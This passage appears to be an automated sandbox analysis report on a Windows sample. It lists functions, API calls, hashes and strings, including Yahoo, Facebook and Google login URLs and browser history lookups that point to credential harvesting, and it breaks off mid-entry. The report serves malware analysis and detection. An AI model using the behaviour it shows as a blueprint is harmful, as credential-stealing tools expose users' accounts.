                                                                                                    • Opcode ID: 42d2b198471ba23b484d6030cc724c76798143dd73cffe3e23afc2ce7932a52a
                                                                                                    • Instruction ID: 54b286f37a9e5f506f1e68b04fba69679f644025d43bd50cf574f3e44c16e14d
                                                                                                    • Opcode Fuzzy Hash: 42d2b198471ba23b484d6030cc724c76798143dd73cffe3e23afc2ce7932a52a
                                                                                                    • Instruction Fuzzy Hash: 62E0C23B104A16DFD70057B8DC80AD77398DFDA238764462AE3A6C31A0C669989286A8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00419D3A, Relevance: 4.7, APIs: 2, Strings: 1, Instructions: 195COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memcmpmemset
                                                                                                    • String ID: SuA
                                                                                                    • API String ID: 1065087418-3257447758
                                                                                                    • Opcode ID: db04e92542e6b3aaa94658e9190d6204cbbc62ce93e16c92fef7196df7266d22
                                                                                                    • Instruction ID: fad126765f7a3012dc58557ca24b8f46baf5ac3168c4fcb101faf68913be9227
                                                                                                    • Opcode Fuzzy Hash: db04e92542e6b3aaa94658e9190d6204cbbc62ce93e16c92fef7196df7266d22
                                                                                                    • Instruction Fuzzy Hash: 54615C71A00205FFDB10EFA5D5A19EEB7A8BB04308F14856FE104D3281D778AED5DB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004156EC, Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041566F: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00415690
                                                                                                      • Part of subcall function 0041566F: GetLastError.KERNEL32 ref: 004156A1
                                                                                                      • Part of subcall function 0041566F: GetLastError.KERNEL32 ref: 004156A7
                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041571C
                                                                                                    • GetLastError.KERNEL32 ref: 00415726
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$File$PointerRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 839530781-0
                                                                                                    • Opcode ID: f1f754ff8d38b18fd2f34c73c7964f2879e3d1e02cacc4787de46049c8681fce
                                                                                                    • Instruction ID: b12ff148b67e67ac81d23560d3cf72bbd379792901d150971560b04290fdb2bd
                                                                                                    • Opcode Fuzzy Hash: f1f754ff8d38b18fd2f34c73c7964f2879e3d1e02cacc4787de46049c8681fce
                                                                                                    • Instruction Fuzzy Hash: 85016236604644FBEB108FA5EC46BE67B6CFB85360F504427F929D6280E764DC9087E9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041566F, Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00415690
                                                                                                    • GetLastError.KERNEL32 ref: 004156A1
                                                                                                    • GetLastError.KERNEL32 ref: 004156A7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156039329-0
                                                                                                    • Opcode ID: 93a9f55f335abe94850d638efa481dd93480ad22e4704bbecc726dfd46a648f0
                                                                                                    • Instruction ID: f96163a87cb5cf3e7b26a2ecd8fb4393a28c3186f912efb518657cf2890c0a54
                                                                                                    • Opcode Fuzzy Hash: 93a9f55f335abe94850d638efa481dd93480ad22e4704bbecc726dfd46a648f0
                                                                                                    • Instruction Fuzzy Hash: 4AF03031611515FBDB009B74DC009EA7BA8EB45360B504726E826D6690E770E9909AD8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407791, Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 004077A8
                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004077BA
                                                                                                    • GetTempFileNameW.KERNELBASE(?,00000000,00000000,?), ref: 004077D1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 1125800050-0
                                                                                                    • Opcode ID: 69a68ce3a8929335a6abb4c9af16a9b9d2f1a09771779bad0dcac4db6d57cc83
                                                                                                    • Instruction ID: dceec3947f2361599edbfe5013bfdf4cbdac7789c87e0c0b85a0ee83958d4a63
                                                                                                    • Opcode Fuzzy Hash: 69a68ce3a8929335a6abb4c9af16a9b9d2f1a09771779bad0dcac4db6d57cc83
                                                                                                    • Instruction Fuzzy Hash: A1E0927A900318A7DB605B60EC4DFC73BBCEB85304F000070B945E2050E734EA84CBA8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407C45, Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,0040F591,00000000,?,00000000,?,00000000), ref: 00407C5D
                                                                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 00407C71
                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004109D0), ref: 00407C7A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 1631957507-0
                                                                                                    • Opcode ID: b33006054204c3f22226da32044044242592d8a33ca403838ebe1a4dd71b4f25
                                                                                                    • Instruction ID: f947f5bc8d83b9a20ae5a28c14ebecb66f59dd5a6728d08dad82f3effb3438ab
                                                                                                    • Opcode Fuzzy Hash: b33006054204c3f22226da32044044242592d8a33ca403838ebe1a4dd71b4f25
                                                                                                    • Instruction Fuzzy Hash: 99E04F3A20425077E3311B66AC0DF8B2EA9EBC7B21F150639FB61A21E086604915C668
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407740, Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • malloc.MSVCRT ref: 0040775C
                                                                                                    • memcpy.MSVCRT ref: 00407774
                                                                                                    • free.MSVCRT(00000000,00000000,?,004082CC,00000002,?,00000000,?,004085FF,00000000,?,00000000), ref: 0040777D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: freemallocmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3056473165-0
                                                                                                    • Opcode ID: 76f48b707a94058680a6f40d87458549ae14feb60c2a44526120605205e17c34
                                                                                                    • Instruction ID: 5a3e67df5a0ad12be7cd4ee336d0fb7e9021b3bb61f8dd67e3c83a894a82c258
                                                                                                    • Opcode Fuzzy Hash: 76f48b707a94058680a6f40d87458549ae14feb60c2a44526120605205e17c34
                                                                                                    • Instruction Fuzzy Hash: 89F08972E092219FD708DB75E98185B779EAF48354715482FF804E7281D738BC40C7A9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004352C1, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 242COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: d
                                                                                                    • API String ID: 0-2564639436
                                                                                                    • Opcode ID: 345d0d764ebd6ca972bf0aedebae5796294cb58c16b8999178ef9269b42d8a74
                                                                                                    • Instruction ID: 3114fae2c67ad3ebaf765358fa036e9ace51f6118b5ff16a0040bb71bc50e22d
                                                                                                    • Opcode Fuzzy Hash: 345d0d764ebd6ca972bf0aedebae5796294cb58c16b8999178ef9269b42d8a74
                                                                                                    • Instruction Fuzzy Hash: 3681E071608741AFCB10EF25C841A5FBBE1BF98359F14082FF8849B251D778DA85CB9A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041CFD2, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID: BINARY
                                                                                                    • API String ID: 2221118986-907554435
                                                                                                    • Opcode ID: 78c0fe4e0afc653c586fc60e63c3bd785bebde7a69a11ea85b59776e0f92b115
                                                                                                    • Instruction ID: b8d77172acda4489b04549da0e417b7414ea86a231f3af488ee06d3a6c19e979
                                                                                                    • Opcode Fuzzy Hash: 78c0fe4e0afc653c586fc60e63c3bd785bebde7a69a11ea85b59776e0f92b115
                                                                                                    • Instruction Fuzzy Hash: 88518FB1A04345AFDB21CF29C885BEA7BE5EF08354F14446AE849CB341D778D981CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040CD85, Relevance: 3.1, APIs: 2, Instructions: 132COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B8BD: ??2@YAPAXI@Z.MSVCRT ref: 0040B8DE
                                                                                                      • Part of subcall function 0040B8BD: ??3@YAXPAX@Z.MSVCRT ref: 0040B9A5
                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,00000000,00000001,?,?,?,0040EABF,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040CDAE
                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,0040EABF,00000000,00000000,?,00000000,00000000,00000000), ref: 0040CEBB
                                                                                                      • Part of subcall function 00407428: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040CDA9,?,?,00000000,00000001,?,?,?,0040EABF), ref: 0040743A
                                                                                                      • Part of subcall function 00407488: GetLastError.KERNEL32(00000000,?,0040CED0,00000000,?,?,?,0040EABF,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040749C
                                                                                                      • Part of subcall function 00407488: _snwprintf.MSVCRT ref: 004074C9
                                                                                                      • Part of subcall function 00407488: MessageBoxW.USER32(?,?,Error,00000030), ref: 004074E2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 1161345128-0
                                                                                                    • Opcode ID: 7e5f3ce9b97ad02501a0decaf9146130338dee3bddd3cbad327fabc3a40b900b
                                                                                                    • Instruction ID: 9fe422a62808acfd29225df7b8372c620b39c2037396e358a401d1d747c90aab
                                                                                                    • Opcode Fuzzy Hash: 7e5f3ce9b97ad02501a0decaf9146130338dee3bddd3cbad327fabc3a40b900b
                                                                                                    • Instruction Fuzzy Hash: 2341A631B00104EBCB259F69C8C9A5F77AAAF85710F51427FF406B72D1C7789D81CA99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040EA0A, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp
                                                                                                    • String ID: /stext
                                                                                                    • API String ID: 2081463915-3817206916
                                                                                                    • Opcode ID: ec877e5db9ddce2f6d9c7e99a3c76656431b5af49b046284d1de84595cf44ce1
                                                                                                    • Instruction ID: 67b4a3a07ca1958535998c338cf90290dd28a79a000b50899eb74dacd75c8968
                                                                                                    • Opcode Fuzzy Hash: ec877e5db9ddce2f6d9c7e99a3c76656431b5af49b046284d1de84595cf44ce1
                                                                                                    • Instruction Fuzzy Hash: 04216F70B00105AFD700FBBBC981A9DB7A9BF48308F10057AB455F7282DB79A9208B59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00409796, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wcslen$FileFindFirst
                                                                                                    • String ID: index.dat
                                                                                                    • API String ID: 1858513025-427268347
                                                                                                    • Opcode ID: b24594195b1162f631ff6231ea29f51af96fa683f9dc73bbf9828ee0c32f1c41
                                                                                                    • Instruction ID: 6dfeaaedd9d7b304872e041cd03108f29a3ef986c8be0c98320f387aa522190f
                                                                                                    • Opcode Fuzzy Hash: b24594195b1162f631ff6231ea29f51af96fa683f9dc73bbf9828ee0c32f1c41
                                                                                                    • Instruction Fuzzy Hash: 0601527141116889EB20EB61CD026DE76BCAF04314F1045BBA858F32D3EB789F818F4D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00413402, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • failed to allocate %u bytes of memory, xrefs: 0041342B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: malloc
                                                                                                    • String ID: failed to allocate %u bytes of memory
                                                                                                    • API String ID: 2803490479-1168259600
                                                                                                    • Opcode ID: 2e46edea950c12d991fe62735999079be22598c657bc745a3c04a02b76f734a5
                                                                                                    • Instruction ID: d519a8a94f3411f47b9f4dbc846c2562789ed4243ce2fb6e055ee428466b1e2a
                                                                                                    • Opcode Fuzzy Hash: 2e46edea950c12d991fe62735999079be22598c657bc745a3c04a02b76f734a5
                                                                                                    • Instruction Fuzzy Hash: DDE026B7F01622A3D2009B1AEC015826790EFD033272A813BFD6CD33C0DA38D84683A9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00409BEC, Relevance: 2.6, APIs: 2, Instructions: 111COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004038B2: LoadLibraryW.KERNEL32(advapi32.dll,?,00409DD4,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,00410971,?,?), ref: 004038BD
                                                                                                      • Part of subcall function 004038B2: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004038D1
                                                                                                      • Part of subcall function 004038B2: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004038DD
                                                                                                      • Part of subcall function 004038B2: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 004038E9
                                                                                                      • Part of subcall function 004038B2: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 004038F5
                                                                                                      • Part of subcall function 004038B2: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403901
                                                                                                      • Part of subcall function 004038B2: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 0040390D
                                                                                                    • wcslen.MSVCRT ref: 00409C2B
                                                                                                    • memset.MSVCRT ref: 00409CAA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoadmemsetwcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1960736289-0
                                                                                                    • Opcode ID: 363ec8ea3dd7b648e966e139c0e7dc641f461e5a29445bd5ef9f1abd3caa8fa0
                                                                                                    • Instruction ID: f1ef4f432af6addeba3b56ded0fd3317a91f6464ca6b0d6cca7d8abb095772ea
                                                                                                    • Opcode Fuzzy Hash: 363ec8ea3dd7b648e966e139c0e7dc641f461e5a29445bd5ef9f1abd3caa8fa0
                                                                                                    • Instruction Fuzzy Hash: 2431A532900109BFDF119FA5DC81DEE77B9AF48304F14847AF505B7282D738AE499B68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040815F, Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • free.MSVCRT(?,00408536,00000000,?,00000000), ref: 00408162
                                                                                                    • free.MSVCRT(?,?,00408536,00000000,?,00000000), ref: 0040816A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: 564d077bbc781c2327730319008b621782e0e974723b6c5bfca6b3da60c4c482
                                                                                                    • Instruction ID: 5f050615a1c05a90e2d7e2b5bf6eca76dfccb14b681c01d6fcfb864336ccf8fa
                                                                                                    • Opcode Fuzzy Hash: 564d077bbc781c2327730319008b621782e0e974723b6c5bfca6b3da60c4c482
                                                                                                    • Instruction Fuzzy Hash: 79D0A8B1815B018ED7B5DF7AD901606BBF1AB083143608E2EA0AAC2A61EB75B5549F48
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040F54F, Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040F5DD: memset.MSVCRT ref: 0040F625
                                                                                                      • Part of subcall function 0040F5DD: wcslen.MSVCRT ref: 0040F63C
                                                                                                      • Part of subcall function 0040F5DD: wcslen.MSVCRT ref: 0040F644
                                                                                                      • Part of subcall function 0040F5DD: wcslen.MSVCRT ref: 0040F69F
                                                                                                      • Part of subcall function 0040F5DD: wcslen.MSVCRT ref: 0040F6AD
                                                                                                      • Part of subcall function 00407C45: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,0040F591,00000000,?,00000000,?,00000000), ref: 00407C5D
                                                                                                      • Part of subcall function 00407C45: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 00407C71
                                                                                                      • Part of subcall function 00407C45: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004109D0), ref: 00407C7A
                                                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 0040F59B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wcslen$File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3170426454-0
                                                                                                    • Opcode ID: 228a695cbd5beb3ec1cf8f45f518b98f90db17c32aed8737d093b8640f2b742f
                                                                                                    • Instruction ID: 9aca494b41dc23dfda6f741e65ddb4eec11de0d3bdf35c7092441241637aafcb
                                                                                                    • Opcode Fuzzy Hash: 228a695cbd5beb3ec1cf8f45f518b98f90db17c32aed8737d093b8640f2b742f
                                                                                                    • Instruction Fuzzy Hash: C4111C72C01118ABCF11EFA5DA425DEB7B9EF44310F10447BE841B7281DA34AB458B95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040515B, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetFilePointerEx.KERNELBASE(00405131,?,?,00000000,00000000,000000FF,00405731,000000FF,000000FF,?,00000000,00405131,?,?,?,0040567E), ref: 00405177
                                                                                                      • Part of subcall function 00407E5E: ReadFile.KERNELBASE(00000000,00000000,00442B08,00000000,00000000,?,?,00442B08,00000000,00000000), ref: 00407E75
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$PointerRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 3154509469-0
                                                                                                    • Opcode ID: d8712b4f01a971ea163a51f14d5c967e7a6069372121b7b9c5bd72e558e1a0ef
                                                                                                    • Instruction ID: 3ed73014879c1cdb76cba20774d0ee22ec490a8702530a12754bea25e796c1cf
                                                                                                    • Opcode Fuzzy Hash: d8712b4f01a971ea163a51f14d5c967e7a6069372121b7b9c5bd72e558e1a0ef
                                                                                                    • Instruction Fuzzy Hash: 77E0C236500100FFE3209B04DC05F17BBB8EBD4700F10882DB1D596070C2326851CB24
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041240A, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00412431
                                                                                                      • Part of subcall function 0041229A: memset.MSVCRT ref: 004122B9
                                                                                                      • Part of subcall function 0041229A: _itow.MSVCRT ref: 004122D0
                                                                                                      • Part of subcall function 0041229A: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 004122DF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 4232544981-0
                                                                                                    • Opcode ID: 253231f08befe00f7ecee28dd5f9964546b0f104d5b7b0b46fbfb9d305b036a5
                                                                                                    • Instruction ID: a7aa967ef583f5c991d77f62e2ef1a5fbeb7e0ff8acc1893da009aba7e534076
                                                                                                    • Opcode Fuzzy Hash: 253231f08befe00f7ecee28dd5f9964546b0f104d5b7b0b46fbfb9d305b036a5
                                                                                                    • Instruction Fuzzy Hash: 7AE0B632000209AFDF125F80ED05AA93BA6FF18315F148559F95854521D37295B0AB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00442C0F, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(?,?,00410749,?,?,0040327A,?), ref: 00442C20
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: b678bcbc9bf6fa280528c23b3fd6324b6332ba7535b8bb6bcd3c64b102c6818c
                                                                                                    • Instruction ID: 356edac0a0dc05b8db56045f67f4f2a8c67b5806a07fcf0a906cd0e85f4ea33d
                                                                                                    • Opcode Fuzzy Hash: b678bcbc9bf6fa280528c23b3fd6324b6332ba7535b8bb6bcd3c64b102c6818c
                                                                                                    • Instruction Fuzzy Hash: 4FE0F6B5900B048FD3348F1BEA84407FBF9BEE46103108E1FE0AAC2A20C7B4A1858F54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407E5E, Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00442B08,00000000,00000000,?,?,00442B08,00000000,00000000), ref: 00407E75
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: ed597b5b9be75ebd1cd4e423a7bdd860f5b566a1fc10a0e693c841e682b4f94d
                                                                                                    • Instruction ID: 24ffdfacb9569e21d2a60ccea280249e0aeb4d25e2eb425103f1318693b0702b
                                                                                                    • Opcode Fuzzy Hash: ed597b5b9be75ebd1cd4e423a7bdd860f5b566a1fc10a0e693c841e682b4f94d
                                                                                                    • Instruction Fuzzy Hash: 43D0C93501020DFBDF01CF80DC06FDD7BBDEB05359F508054BA1095060D7759A10AB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407E7D, Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040CDD7,00000000,00449C74,00000002,?,?,?,0040EABF,00000000), ref: 00407E94
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3934441357-0
                                                                                                    • Opcode ID: 299008068c7c14b09207cf4a43b459d0d2fe619c9f56c227084e384b62c46895
                                                                                                    • Instruction ID: ed8ba03b9114bb6b7c8cb7e53950ad1193b734940bca9d25f6e83ac984d4b60e
                                                                                                    • Opcode Fuzzy Hash: 299008068c7c14b09207cf4a43b459d0d2fe619c9f56c227084e384b62c46895
                                                                                                    • Instruction Fuzzy Hash: 1FD0C93611020DFBDF01CF80DC06FDD7B7DEB04359F108064BA1495060D7B59A24AB64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040740F, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00442ACA,00000000,?,00000000,00000000,00410EBE,?,?), ref: 00407421
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 92376b3566d3feeccbeb14388a2e939cb9084ff7488c5f5633203e732b9178ce
                                                                                                    • Instruction ID: aca0a4a9ffb514d764de6b39d132ebce89ca9c707cc6a096ed05556fb5c53862
                                                                                                    • Opcode Fuzzy Hash: 92376b3566d3feeccbeb14388a2e939cb9084ff7488c5f5633203e732b9178ce
                                                                                                    • Instruction Fuzzy Hash: 66C092B0240201BEFF228B10ED16F36295CD780700F2044247F00E40E0D1A04E208924
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407428, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040CDA9,?,?,00000000,00000001,?,?,?,0040EABF), ref: 0040743A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 16de4267e2e02615b86f59db3db7832feff9f3efdab04feda918f8b373e94b10
                                                                                                    • Instruction ID: 30f23977c1a0d912056bd80a2fcf251873b773a5be14bf399c479e912e77915f
